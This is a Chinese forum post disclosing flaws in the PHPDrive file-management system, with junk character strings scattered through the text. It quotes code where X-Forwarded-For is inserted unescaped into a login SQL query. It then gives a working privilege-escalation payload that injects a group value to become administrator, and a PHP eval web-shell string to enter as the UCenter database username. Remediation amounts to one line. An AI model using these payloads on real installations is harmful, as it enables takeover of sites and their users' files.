PHPDrive 是一套运行于 PHP 环境的文件管理系统,可以应用于网盘、企业文件管理、学校、团队管理、软件站、文件CMS等: e, a- R0 Z2 D1 m* {
4 X( ^8 Q# \2 [8 g
includes/user.lib.php
3 I, }( f* S W( U s0 A5 \行873 ?: N4 c6 W, M7 b6 e8 R
function get_ip() {
, o* y' V: Q) [7 p3 o5 ? if(isset($_SERVER["HTTP_X_FORWARDED_FOR"])&&$_SERVER["HTTP_X_FORWARDED_FOR"]) $ip = $_SERVER["HTTP_X_FORWARDED_FOR"];.
. S0 n2 [6 r$ L/ P+ R) a在用户注册与登录 处module/disk/account.lead.php2 P5 T* g' V9 H* L
198行 1 ] ]( e, {4 p
//更新本次登录IP和时间 J8 j' k# J$ y. q8 G' j
$db->Query(‘UPDATE `’.$db->TPre.’user` SET `before_last_date` = ‘.$UserArr['last_date'].’,`last_date` = ‘.$NowUnixTime.’,`before_last_ip` = “‘.$UserArr['last_ip'].’”,`last_ip` = “‘.get_ip().’” WHERE `uid` = ‘.$UserArr['uid'].’;');//get_ip()入库注入产生! h: \" ^) x% ^" s1 O) j
由于本套程序user与manager是存在于同一个表下的,只是用group字段来区分两者,group=1为管理员,2则为普通用户。所以可以利用以上注入,将普通用户的group值改为1,即可提升权限
/ `" O; z- q8 R4 B) M& x9 b# c实现方法:使用firefox的一款插件x-forwarded-for Header 1.0,将你的IP地址改为123″,`group`=”1然后登陆,这时候你就是管理员了.
; I; s+ A1 o- n$ T+ `4 H: o! z后台getshell:
1 @4 G: b5 N1 l3 E在UCenter设置处,将UC数据库登录名填写为0 \: A0 l6 q- d c" q' x7 `
# D; u; I+ n: s
root’);eval($_POST[DisKill]);?>/*& {- { P& U1 @. v5 ]# y
可以得到一个shell,位置在 data/uc.data.php
: B& }$ ^: J: W. x1 z% J
: F+ N, W8 y9 l) _1 \修复:过滤注入8 C8 n1 h- C5 F# }. A* A
, m4 U3 D X& I. I' r
|
发表于 2012-12-31 09:18:34
收藏
支持
反对